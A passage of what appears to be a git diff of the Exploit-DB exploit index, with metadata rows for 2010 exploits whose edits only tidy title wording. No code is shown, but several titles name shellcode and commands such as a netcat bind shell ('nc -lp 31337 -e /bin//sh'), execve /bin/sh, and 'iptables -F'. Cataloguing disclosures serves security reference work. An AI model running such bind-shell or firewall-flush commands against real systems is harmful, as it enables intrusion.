14235,platforms/linux/shellcode/14235.c,"Linux - _nc -lp 31337 -e /bin//sh_ polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 -14237,platforms/php/webapps/14237.txt,"IBM Bladecenter Management - Multiple Web application vulnerabilities",2010-07-06,"Alexey Sintsov",php,webapps,0 +14237,platforms/php/webapps/14237.txt,"IBM Bladecenter Management - Multiple Web Application Vulnerabilities",2010-07-06,"Alexey Sintsov",php,webapps,0 14238,platforms/php/webapps/14238.txt,"BS Auction - SQL Injection",2010-07-06,"Easy Laster",php,webapps,0 14239,platforms/php/webapps/14239.txt,"Auto Dealer - SQL Injection (PoC)",2010-07-06,"Easy Laster",php,webapps,0 -14240,platforms/php/webapps/14240.txt,"BS Auto Classifieds - (info.php) SQL Injection (PoC)",2010-07-06,"Easy Laster",php,webapps,0 +14240,platforms/php/webapps/14240.txt,"BS Auto Classifieds - 'info.php' SQL Injection (PoC)",2010-07-06,"Easy Laster",php,webapps,0 14241,platforms/php/webapps/14241.txt,"BS Business Directory - (articlesdetails.php) SQL Injection (PoC)",2010-07-06,"Easy Laster",php,webapps,0 14242,platforms/php/webapps/14242.txt,"BS Classifieds Ads - (articlesdetails.php) SQL Injection (PoC)",2010-07-06,"Easy Laster",php,webapps,0 14243,platforms/php/webapps/14243.txt,"BS Events Directory - (articlesdetails.php) SQL Injection (PoC)",2010-07-06,"Easy Laster",php,webapps,0 14244,platforms/php/webapps/14244.txt,"Lyrics 3.0 - Engine SQL Injection",2010-07-06,Sid3^effects,php,webapps,0 -14245,platforms/php/webapps/14245.txt,"Pre Multi-Vendor Shopping Malls - SQL Injection / Authentication Bypass",2010-07-06,**RoAd_KiLlEr**,php,webapps,0 +14245,platforms/php/webapps/14245.txt,"Pre Multiple Vendors Shopping Malls - SQL Injection / Authentication Bypass",2010-07-06,**RoAd_KiLlEr**,php,webapps,0 14248,platforms/windows/remote/14248.py,"minerCPP 0.4b - Remote Buffer Overflow / Format String Attack Exploit",2010-07-06,l3D,windows,remote,0 14249,platforms/php/webapps/14249.txt,"Joomla com_autartimonial - SQL Injection",2010-07-06,Sid3^effects,php,webapps,0 14251,platforms/php/webapps/14251.txt,"PsNews 1.3 - SQL Injection",2010-07-06,S.W.T,php,webapps,0 -14254,platforms/osx/remote/14254.py,"EvoCam Web Server OSX (Snow Leopard) - ROP Remote Exploit",2010-07-06,d1dn0t,osx,remote,0 +14254,platforms/osx/remote/14254.py,"Apple Mac OS X (Snow Leopard) EvoCam Web Server - ROP Remote Exploit",2010-07-06,d1dn0t,osx,remote,0 14285,platforms/windows/webapps/14285.txt,"Outlook Web Access 2007 - Cross-Site Request Forgery",2010-07-08,"Rosario Valotta",windows,webapps,0 14255,platforms/php/webapps/14255.txt,"sandbox 2.0.3 - Multiple Vulnerabilities",2010-07-06,"Salvatore Fresta",php,webapps,0 14256,platforms/windows/local/14256.txt,"HP NNM 7.53 - ovwebsnmpsrv.exe Buffer Overflow (SEH)",2010-07-07,bitform,windows,local,0 @@ -12545,14 +12546,14 @@ id,file,description,date,author,platform,type,port 14261,platforms/arm/shellcode/14261.c,"ARM - Polymorphic execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (Generator)",2010-07-07,"Jonathan Salwan",arm,shellcode,0 14262,platforms/php/webapps/14262.txt,"Simple Document Management System (SDMS) - SQL Injection",2010-07-07,Sid3^effects,php,webapps,0 14264,platforms/hardware/webapps/14264.html,"Harris Stratex StarMAX 2100 WIMAX Subscriber Station - Running Config Cross-Site Request Forgery Exploit",2010-07-07,kalyanakumar,hardware,webapps,0 -14263,platforms/php/webapps/14263.txt,"artforms 2.1b7.2 rc2 joomla component - Multiple Vulnerabilities",2010-07-07,"Salvatore Fresta",php,webapps,0 +14263,platforms/php/webapps/14263.txt,"artforms 2.1b7.2 rc2 joomla Component - Multiple Vulnerabilities",2010-07-07,"Salvatore Fresta",php,webapps,0 14265,platforms/php/webapps/14265.txt,"Joomla PaymentsPlus - Mtree 2.1.5 - Blind SQL Injection",2010-07-07,Sid3^effects,php,webapps,0 14267,platforms/windows/remote/14267.txt,"EA Battlefield 2 / Battlefield 2142 - Multiple Arbitrary File Upload Vulnerabilities",2010-07-08,"Luigi Auriemma",windows,remote,0 14268,platforms/multiple/dos/14268.txt,"Qt 4.6.3 - 'QSslSocketBackendPrivate::transmit()' Denial of Service",2010-07-08,"Luigi Auriemma",multiple,dos,0 14269,platforms/windows/remote/14269.html,"FathFTP 1.7 - ActiveX Buffer Overflow",2010-07-08,blake,windows,remote,0 14270,platforms/php/webapps/14270.txt,"Zylone IT - Multiple Blind SQL Injection",2010-07-08,Callo,php,webapps,0 -14271,platforms/php/webapps/14271.txt,"pithcms - (theme) Local/Remote File inclusion",2010-07-08,eidelweiss,php,webapps,0 -14272,platforms/osx/remote/14272.py,"UFO: Alien Invasion 2.2.1 (OSX Snow Leopard) - IRC Client Remote Code Execution (ROP)",2010-07-08,d1dn0t,osx,remote,0 +14271,platforms/php/webapps/14271.txt,"pithcms - (theme) Local/Remote File Inclusion",2010-07-08,eidelweiss,php,webapps,0 +14272,platforms/osx/remote/14272.py,"UFO: Alien Invasion 2.2.1 (OS X Snow Leopard) - IRC Client Remote Code Execution (ROP)",2010-07-08,d1dn0t,osx,remote,0 14275,platforms/windows/remote/14275.txt,"Real Player 12.0.0.879 - Exploit",2010-07-08,webDEViL,windows,remote,0 14276,platforms/linux/shellcode/14276.c,"Linux - Find all writeable folder in filesystem polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,linux,shellcode,0 14277,platforms/php/webapps/14277.txt,"Inout Music 1.0 - Arbitrary File Upload",2010-07-08,SONIC,php,webapps,0 @@ -12561,10 +12562,10 @@ id,file,description,date,author,platform,type,port 14280,platforms/php/webapps/14280.txt,"PG Social Networking - Arbitrary File Upload",2010-07-08,SONIC,php,webapps,0 14286,platforms/windows/dos/14286.txt,"Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow",2010-07-08,"Luigi Auriemma",windows,dos,0 14281,platforms/asp/webapps/14281.txt,"KMSoft GB - SQL Injection",2010-07-08,SONIC,asp,webapps,0 -14282,platforms/windows/dos/14282.txt,"Windows - cmd.exe Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0 +14282,platforms/windows/dos/14282.txt,"Microsoft Windows - cmd.exe Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0 14283,platforms/asp/webapps/14283.txt,"ClickGallery Server - SQL Injection",2010-07-08,SONIC,asp,webapps,0 14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerabilities",2010-07-08,SONIC,asp,webapps,0 -14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Exploit with DEP bypass",2010-07-09,dmc,windows,remote,0 +14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Exploit (DEP Bypass)",2010-07-09,dmc,windows,remote,0 14288,platforms/win_x86/shellcode/14288.asm,"Win32 - Write-to-file Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",win_x86,shellcode,0 14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery",2010-07-09,saudi0hacker,php,webapps,0 14290,platforms/windows/dos/14290.py,"MP3 Cutter 1.5 - Denial of Service",2010-07-09,"Prashant Uniyal",windows,dos,0 @@ -12578,9 +12579,9 @@ id,file,description,date,author,platform,type,port 14305,platforms/lin_x86-64/shellcode/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)",2010-07-09,10n1z3d,lin_x86-64,shellcode,0 14306,platforms/php/webapps/14306.txt,"HoloCMS 9.0.47 - 'news.php' SQL Injection",2010-07-09,GlaDiaT0R,php,webapps,0 14309,platforms/windows/remote/14309.html,"RSP MP3 Player OCX 3.2 - ActiveX Buffer Overflow",2010-07-09,blake,windows,remote,0 -14308,platforms/php/webapps/14308.txt,"Wordpress Firestats Plugin - Remote Configuration File Download",2010-07-09,"Jelmer de Hen",php,webapps,0 +14308,platforms/php/webapps/14308.txt,"WordPress Firestats Plugin - Remote Configuration File Download",2010-07-09,"Jelmer de Hen",php,webapps,0 15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 - HTTP Server Remote Integer Overflow Denial of Service",2010-10-23,d0lc3,windows,dos,0 -14310,platforms/php/webapps/14310.js,"DotDefender 3.8-5 - Pre-Authentication Remote Code Execution (via Cross-Site Scripting)",2010-07-09,rAWjAW,php,webapps,80 +14310,platforms/php/webapps/14310.js,"dotDefender 3.8-5 - Pre-Authentication Remote Code Execution (via Cross-Site Scripting)",2010-07-09,rAWjAW,php,webapps,80 14313,platforms/php/webapps/14313.txt,"Joomla MyHome Component (com_myhome) - Blind SQL Injection",2010-07-10,Sid3^effects,php,webapps,0 14315,platforms/php/webapps/14315.txt,"Joomla MySms Component (com_mysms) - Upload",2010-07-10,Sid3^effects,php,webapps,0 14335,platforms/php/webapps/14335.txt,"Joomla Health & Fitness Stats - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,php,webapps,0 @@ -12589,7 +12590,7 @@ id,file,description,date,author,platform,type,port 14320,platforms/php/webapps/14320.pl,"PHP-Nuke 8.1.0.3.5b (Your_Account Module) - Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0 14324,platforms/php/webapps/14324.txt,"Sillaj time tracking tool - Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0 -14326,platforms/php/webapps/14326.txt,"My Kazaam Address & Contact Organizer - SQL Injection",2010-07-10,v3n0m,php,webapps,0 +14326,platforms/php/webapps/14326.txt,"My Kazaam Address & Contact ORGanizer - SQL Injection",2010-07-10,v3n0m,php,webapps,0 14327,platforms/php/webapps/14327.txt,"Joomla Rapid Recipe - Persistent Cross-Site Scripting",2010-07-10,Sid3^effects,php,webapps,0 14328,platforms/php/webapps/14328.html,"Macs CMS 1.1.4 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0 14329,platforms/php/webapps/14329.html,"Frog CMS 0.9.5 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0 @@ -12598,7 +12599,7 @@ id,file,description,date,author,platform,type,port 14332,platforms/lin_x86/shellcode/14332.c,"Linux/x86 - netcat bindshell port 8080 Shellcode (75 bytes)",2010-07-11,blake,lin_x86,shellcode,0 14336,platforms/php/webapps/14336.txt,"Joomla EasyBlog - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,php,webapps,0 14337,platforms/php/webapps/14337.html,"TheHostingTool 1.2.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 -14338,platforms/php/webapps/14338.html,"GetSimple CMS 2.01 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 +14338,platforms/php/webapps/14338.html,"Getsimple CMS 2.01 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 14339,platforms/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)",2010-07-12,anonymous,linux,local,0 14342,platforms/php/webapps/14342.html,"Grafik CMS 1.1.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 14355,platforms/windows/webapps/14355.txt,"dotDefender 4.02 - Authentication Bypass",2010-07-13,"David K",windows,webapps,0 @@ -12611,7 +12612,7 @@ id,file,description,date,author,platform,type,port 14353,platforms/php/webapps/14353.html,"Diferior CMS 8.03 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-13,10n1z3d,php,webapps,0 14354,platforms/php/webapps/14354.txt,"AJ Article - Persistent Cross-Site Scripting",2010-07-13,Sid3^effects,php,webapps,0 14356,platforms/php/webapps/14356.txt,"CustomCMS - Persistent Cross-Site Scripting",2010-07-13,Sid3^effects,php,webapps,0 -14357,platforms/php/webapps/14357.txt,"2DayBiz Businesscard Script - Authentication bypass",2010-07-14,D4rk357,php,webapps,0 +14357,platforms/php/webapps/14357.txt,"2DayBiz Businesscard Script - Authentication Bypass",2010-07-14,D4rk357,php,webapps,0 14361,platforms/windows/local/14361.py,"Microsoft Excel - 0x5D record Stack Overflow",2010-07-14,webDEViL,windows,local,0 14362,platforms/php/webapps/14362.txt,"CMSQLite - SQL Injection",2010-07-14,"High-Tech Bridge SA",php,webapps,0 14365,platforms/php/webapps/14365.txt,"Campsite CMS - Remote Persistent Cross-Site Scripting",2010-07-15,D4rk357,php,webapps,0 @@ -12621,7 +12622,7 @@ id,file,description,date,author,platform,type,port 14370,platforms/php/webapps/14370.txt,"BS Scripts Directory - 'info.php' SQL Injection",2010-07-15,D4rk357,php,webapps,0 14371,platforms/php/webapps/14371.txt,"BS Scripts Directory - 'articlesdetails.php' SQL Injection",2010-07-16,k4k4shi,php,webapps,0 14372,platforms/windows/dos/14372.txt,"Haihaisoft PDF Reader OCX Control 1.1.2.0 - Remote Buffer Overflow",2010-07-16,shinnai,windows,dos,0 -14373,platforms/win_x86/local/14373.pl,"Mini-Stream RM-MP3 Converter 3.1.2.1 - '.pls' Stack Buffer Overflow universal",2010-07-16,Madjix,win_x86,local,0 +14373,platforms/win_x86/local/14373.pl,"Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Stack Buffer Overflow Universal",2010-07-16,Madjix,win_x86,local,0 14374,platforms/php/webapps/14374.txt,"Pre Web Host System - Authentication Bypass",2010-07-16,D4rk357,php,webapps,0 14375,platforms/php/webapps/14375.txt,"Pre Dynamic Institution - Web Authentication Bypass",2010-07-16,D4rk357,php,webapps,0 14376,platforms/php/webapps/14376.txt,"Pre E-Smart Cart - Authentication Bypass",2010-07-16,D4rk357,php,webapps,0 @@ -12646,20 +12647,20 @@ id,file,description,date,author,platform,type,port 14394,platforms/php/webapps/14394.txt,"Joomla Component (com_spa) - SQL Injection",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0 14395,platforms/php/webapps/14395.txt,"Joomla Component (com_staticxt) - SQL Injection",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0 14397,platforms/windows/local/14397.rb,"MoreAmp - SEH Buffer Overflow (Metasploit)",2010-07-17,Madjix,windows,local,0 -14404,platforms/php/webapps/14404.txt,"Kayako eSupport 3.70.02 - (functions.php) SQL Injection",2010-07-18,ScOrPiOn,php,webapps,0 +14404,platforms/php/webapps/14404.txt,"Kayako eSupport 3.70.02 - 'functions.php' SQL Injection",2010-07-18,ScOrPiOn,php,webapps,0 14405,platforms/php/webapps/14405.txt,"PHP-Fusion - Remote Command Execution",2010-07-18,"ViRuS Qalaa",php,webapps,0 -14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - MKD Command Remote Buffer Overflow (Post-Authenticated)",2010-07-17,"Karn Ganeshen",windows,remote,0 -14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - LIST Command Remote Buffer Overflow (Post-Authenticated)",2010-07-17,"Karn Ganeshen",windows,remote,0 +14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - (Post-Authentication) 'MKD' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0 +14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - (Post-Authentication) 'LIST' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0 14401,platforms/asp/webapps/14401.txt,"ClickAndRank Script - Authentication Bypass",2010-07-18,walid,asp,webapps,0 -14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - CWD Command Remote Buffer Overflow (Post-Authenticated)",2010-07-18,fdiskyou,windows,remote,0 +14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - (Post-Authentication) 'CWD' Command Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0 14403,platforms/windows/local/14403.txt,"Microsoft Windows - Automatic LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,windows,local,0 -14406,platforms/bsd/local/14406.pl,"GhostScript - .PostScript File Stack Overflow",2010-07-18,"Rodrigo Rubira Branco",bsd,local,0 +14406,platforms/bsd/local/14406.pl,"Ghostscript - '.PostScript' File Stack Overflow",2010-07-18,"Rodrigo Rubira Branco",bsd,local,0 14407,platforms/aix/remote/14407.c,"rpc.pcnfsd - Remote Format String Exploit",2010-07-18,"Rodrigo Rubira Branco",aix,remote,0 14408,platforms/windows/dos/14408.py,"Really Simple IM 1.3beta - Denial of Service (PoC)",2010-07-18,loneferret,windows,dos,0 14409,platforms/aix/remote/14409.pl,"AIX5l with FTP-Server - Remote Root Hash Disclosure Exploit",2010-07-18,kingcope,aix,remote,0 14410,platforms/php/webapps/14410.txt,"rapidCMS 2.0 - Authentication Bypass",2010-07-18,Mahjong,php,webapps,0 14412,platforms/windows/remote/14412.rb,"Hero DVD - Buffer Overflow (Metasploit)",2010-07-19,Madjix,windows,remote,0 -14413,platforms/windows/dos/14413.txt,"Microsoft Internet Explorer 7.0 - Denial of Service Microsoft Clip Organizer Multiple Insecure ActiveX Control",2010-07-20,"Beenu Arora",windows,dos,0 +14413,platforms/windows/dos/14413.txt,"Microsoft Internet Explorer 7 - Denial of Service Microsoft Clip Organizer Multiple Insecure ActiveX Control",2010-07-20,"Beenu Arora",windows,dos,0 14414,platforms/windows/dos/14414.txt,"Unreal Tournament 3 2.1 - 'STEAMBLOB' Command Remote Denial of Service",2010-07-20,"Luigi Auriemma",windows,dos,0 14415,platforms/php/webapps/14415.html,"EZ-osCommerce 3.1 - Remote File Upload",2010-07-20,indoushka,php,webapps,0 14416,platforms/windows/remote/14416.html,"SapGUI BI 7100.1.400.8 - Heap Corruption Exploit",2010-07-20,"Elazar Broad",windows,remote,0 @@ -12670,18 +12671,18 @@ id,file,description,date,author,platform,type,port 14425,platforms/php/webapps/14425.txt,"PHP Chat for 123 Flash Chat - Remote File Inclusion",2010-07-20,"HaCkEr arar",php,webapps,0 14426,platforms/php/webapps/14426.pl,"Imagine-cms 2.50 - SQL Injection",2010-07-21,Metropolis,php,webapps,0 14427,platforms/windows/webapps/14427.txt,"Outlook Web Access 2003 - Cross-Site Request Forgery",2010-07-21,anonymous,windows,webapps,0 -14428,platforms/windows/local/14428.py,"QQPlayer - .asx File Processing Buffer Overflow",2010-07-21,"Li Qingshan",windows,local,0 -14431,platforms/windows/local/14431.py,"QQPlayer - .cue File Buffer Overflow",2010-07-21,"Lufeng Li",windows,local,0 -14432,platforms/php/webapps/14432.txt,"OpenX - (phpAdsNew) Remote File inclusion",2010-07-21,"ViRuS Qalaa",php,webapps,0 +14428,platforms/windows/local/14428.py,"QQPlayer - '.asx' File Processing Buffer Overflow",2010-07-21,"Li Qingshan",windows,local,0 +14431,platforms/windows/local/14431.py,"QQPlayer - '.cue' File Buffer Overflow",2010-07-21,"Lufeng Li",windows,local,0 +14432,platforms/php/webapps/14432.txt,"OpenX - (phpAdsNew) Remote File Inclusion",2010-07-21,"ViRuS Qalaa",php,webapps,0 14430,platforms/php/webapps/14430.txt,"RapidLeech Scripts - Remote File Upload",2010-07-21,H-SK33PY,php,webapps,0 14433,platforms/windows/local/14433.pl,"ZipCentral - '.zip' Buffer Overflow (SEH)",2010-07-21,"Jiten Pathy",windows,local,0 14435,platforms/php/webapps/14435.txt,"AJ HYIP PRIME - 'welcome.php id' Blind SQL Injection",2010-07-22,JosS,php,webapps,0 14436,platforms/php/webapps/14436.txt,"AJ HYIP MERIDIAN - 'news.php id' Blind SQL Injection",2010-07-22,JosS,php,webapps,0 14437,platforms/php/webapps/14437.txt,"Free PHP photo Gallery script - Remote Command Execution",2010-07-22,"ViRuS Qalaa",php,webapps,0 -14438,platforms/php/webapps/14438.txt,"Free PHP photo Gallery script - Remote File inclusion",2010-07-22,"ViRuS Qalaa",php,webapps,0 +14438,platforms/php/webapps/14438.txt,"Free PHP photo Gallery script - Remote File Inclusion",2010-07-22,"ViRuS Qalaa",php,webapps,0 14439,platforms/php/webapps/14439.txt,"phpBazar Admin - Information Disclosure",2010-07-22,Net_Spy,php,webapps,0 14440,platforms/php/webapps/14440.txt,"phpBB MOD 2.0.19 - Invitation Only (PassCode Bypass)",2010-07-22,Silic0n,php,webapps,0 -14441,platforms/php/webapps/14441.txt,"Wordpress Plugin myLDlinker - SQL Injection",2010-07-22,H-SK33PY,php,webapps,0 +14441,platforms/php/webapps/14441.txt,"WordPress Plugin myLDlinker - SQL Injection",2010-07-22,H-SK33PY,php,webapps,0 14442,platforms/php/webapps/14442.txt,"ZeeAdbox 2.x - SQL Injection",2010-07-23,SONIC,php,webapps,0 14443,platforms/php/webapps/14443.txt,"LILDBI - Arbitrary File Upload",2010-07-23,EraGoN,php,webapps,0 14444,platforms/php/webapps/14444.txt,"ZeeNetworking 1x - Arbitrary File Upload",2010-07-23,SONIC,php,webapps,0 @@ -12691,13 +12692,13 @@ id,file,description,date,author,platform,type,port 14448,platforms/php/webapps/14448.txt,"Joomla Component (com_golfcourseguide) 0.9.6.0 (Beta) / 1 (Beta) - SQL Injection",2010-07-23,Valentin,php,webapps,0 14449,platforms/php/webapps/14449.txt,"Joomla Component (com_huruhelpdesk) - SQL Injection",2010-07-23,Amine_92,php,webapps,0 14450,platforms/php/webapps/14450.txt,"Joomla Component (com_iproperty) - SQL Injection",2010-07-23,Amine_92,php,webapps,0 -14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - LIST Command Remote Buffer Overflow Exploit (Post-Authenticated) (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0 +14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - (Post-Authentication) 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0 14452,platforms/linux/dos/14452.txt,"ftp Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow",2010-07-23,d0lc3,linux,dos,0 14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - (ecard.php) SQL Injection",2010-07-23,CoBRa_21,php,webapps,0 14454,platforms/php/webapps/14454.txt,"ValidForm Builder script - Remote Command Execution",2010-07-23,"HaCkEr arar",php,webapps,0 14455,platforms/php/webapps/14455.txt,"vBulletin(R) 3.8.6 - faq.php Information Disclosure",2010-07-24,H-SK33PY,php,webapps,0 14456,platforms/aix/remote/14456.c,"IBM AIX 5l FTPd - Remote DES Hash Exploit",2010-07-24,kingcope,aix,remote,0 -14457,platforms/php/webapps/14457.txt,"DM Filemanager 3.9.11 - Arbitrary File Upload",2010-07-24,eidelweiss,php,webapps,0 +14457,platforms/php/webapps/14457.txt,"DM FileManager 3.9.11 - Arbitrary File Upload",2010-07-24,eidelweiss,php,webapps,0 14458,platforms/php/webapps/14458.txt,"sNews - 'index.php' SQL Injection",2010-07-24,MajoR,php,webapps,0 14459,platforms/php/webapps/14459.txt,"Open Realty 2.x / 3.x - Persistent Cross-Site Scripting",2010-07-24,K053,php,webapps,0 14461,platforms/asp/webapps/14461.txt,"AKY Blog - SQL Injection",2010-07-24,v0calist,asp,webapps,0 @@ -12713,36 +12714,36 @@ id,file,description,date,author,platform,type,port 14472,platforms/php/webapps/14472.txt,"WhiteBoard 0.1.30 - Multiple Blind SQL Injection",2010-07-25,"Salvatore Fresta",php,webapps,0 14483,platforms/php/webapps/14483.pl,"PunBB 1.3.4 / Pun_PM 1.2.6 - Blind SQL Injection",2010-07-27,Dante90,php,webapps,0 14474,platforms/php/webapps/14474.txt,"Freeway CMS 1.4.3.210 - SQL Injection",2010-07-26,**RoAd_KiLlEr**,php,webapps,0 -14476,platforms/php/webapps/14476.txt,"Joomla Component (com_joomla-visites) - Remote File inclusion",2010-07-26,Li0n-PaL,php,webapps,0 +14476,platforms/php/webapps/14476.txt,"Joomla Component (com_joomla-visites) - Remote File Inclusion",2010-07-26,Li0n-PaL,php,webapps,0 14477,platforms/windows/dos/14477.txt,"Media Player Classic - Heap Overflow/Denial of Service",2010-07-26,"Praveen Darshanam",windows,dos,0 14481,platforms/php/webapps/14481.txt,"Joomla Component TTVideo 1.0 - SQL Injection",2010-07-27,"Salvatore Fresta",php,webapps,0 14482,platforms/windows/local/14482.py,"QQPlayer 2.3.696.400p1 - smi File Buffer Overflow",2010-07-27,"Lufeng Li",windows,local,0 14484,platforms/windows/dos/14484.html,"Microsoft Internet Explorer 6 / 7 - Remote Denial of Service",2010-07-27,"Richard leahy",windows,dos,0 14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion",2010-07-27,"John Leitch",php,webapps,0 14491,platforms/windows/local/14491.txt,"Zemana AntiLogger AntiLog32.sys 1.5.2.755 - Privilege Escalation",2010-07-28,th_decoder,windows,local,0 -14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - HTTP Remote Buffer Overflow (Post-Authenticated)",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0 +14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - (Post-Authentication) HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0 14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdiskyou,windows,local,0 -14488,platforms/php/webapps/14488.txt,"joomla component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0 +14488,platforms/php/webapps/14488.txt,"joomla Component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0 14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 - utf8 Directory Traversal (2)",2010-07-28,mywisdom,unix,remote,0 -14490,platforms/php/webapps/14490.txt,"nuBuilder - Remote File inclusion",2010-07-28,Ahlspiess,php,webapps,0 +14490,platforms/php/webapps/14490.txt,"nuBuilder - Remote File Inclusion",2010-07-28,Ahlspiess,php,webapps,0 14492,platforms/windows/remote/14492.c,"Symantec Ams Intel Alert Handler Service - Design Flaw",2010-07-28,Spider,windows,remote,0 14494,platforms/php/webapps/14494.txt,"AV Arcade 3 - Cookie SQL Injection Authentication Bypass",2010-07-28,saudi0hacker,php,webapps,0 14495,platforms/php/webapps/14495.txt,"Joomla Component PhotoMap Gallery 1.6.0 - Multiple Blind SQL Injections",2010-07-28,"Salvatore Fresta",php,webapps,0 14499,platforms/php/webapps/14499.txt,"Joomla Component PBBooking 1.0.4_3 - Multiple Blind SQL Injection",2010-07-29,"Salvatore Fresta",php,webapps,0 14500,platforms/php/webapps/14500.txt,"Whizzy CMS 10.02 - Local File Inclusion",2010-07-29,"Anarchy Angel",php,webapps,0 -14501,platforms/php/webapps/14501.txt,"Joomla SimpleShop Component (com_simpleshop) - SQL Injection",2010-07-29,"UnD3rGr0unD W4rri0rZ",php,webapps,0 +14501,platforms/php/webapps/14501.txt,"Joomla SimpleShop Component (com_SimpleShop) - SQL Injection",2010-07-29,"UnD3rGr0unD W4rri0rZ",php,webapps,0 14502,platforms/php/webapps/14502.txt,"Joomla Component (com_beamospetition) - SQL Injection",2010-07-29,Forza-Dz,php,webapps,0 14503,platforms/windows/local/14503.pl,"HTML Email Creator 2.42 build 718 - Buffer Overflow (SEH)",2010-07-29,Madjix,windows,local,0 -14504,platforms/windows/dos/14504.html,"BarCodeWiz BarCode ActiveX 3.29 - (PoC)",2010-07-30,loneferret,windows,dos,0 -14505,platforms/windows/remote/14505.html,"BarCodeWiz Barcode ActiveX Control 3.29 - Buffer Overflow Exploit (SEH)",2010-07-30,loneferret,windows,remote,0 +14504,platforms/windows/dos/14504.html,"Barcodewiz BarCode ActiveX 3.29 - (PoC)",2010-07-30,loneferret,windows,dos,0 +14505,platforms/windows/remote/14505.html,"Barcodewiz Barcode ActiveX Control 3.29 - Buffer Overflow Exploit (SEH)",2010-07-30,loneferret,windows,remote,0 14511,platforms/windows/dos/14511.pl,"ChordPulse 1.4 - Denial of Service",2010-07-30,Madjix,windows,dos,0 -14514,platforms/windows/remote/14514.html,"SigPlus Pro 3.74 - ActiveX LCDWriteString() Remote Buffer Overflow JIT Spray (aslr/dep Bypass)",2010-07-31,mr_me,windows,remote,0 +14514,platforms/windows/remote/14514.html,"SigPlus Pro 3.74 - ActiveX LCDWriteString() Remote Buffer Overflow JIT Spray (ASLR + DEP Bypass)",2010-07-31,mr_me,windows,remote,0 14525,platforms/windows/dos/14525.pl,"Jaangle 0.98e.971 - Denial of Service",2010-08-02,s-dz,windows,dos,0 14527,platforms/windows/local/14527.pl,"WM Downloader 3.1.2.2 - Buffer Overflow (1)",2010-08-02,s-dz,windows,local,0 14515,platforms/windows/dos/14515.pl,"Xmyplay 3.5.1 - Denial of Service",2010-07-31,s-dz,windows,dos,0 14517,platforms/windows/dos/14517.pl,"Xion Audio Player 1.0.125 - Denial of Service",2010-07-31,s-dz,windows,dos,0 14518,platforms/php/webapps/14518.txt,"Joomla Component Spielothek 1.6.9 - Multiple Blind SQL Injection",2010-07-31,"Salvatore Fresta",php,webapps,0 -14519,platforms/windows/remote/14519.html,"Barcodewiz 3.29 - Barcode ActiveX Control Remote Heap Spray Exploit (IE6/IE7)",2010-07-31,Dr_IDE,windows,remote,0 +14519,platforms/windows/remote/14519.html,"Barcodewiz 3.29 - Barcode ActiveX Control Remote Heap Spray Exploit 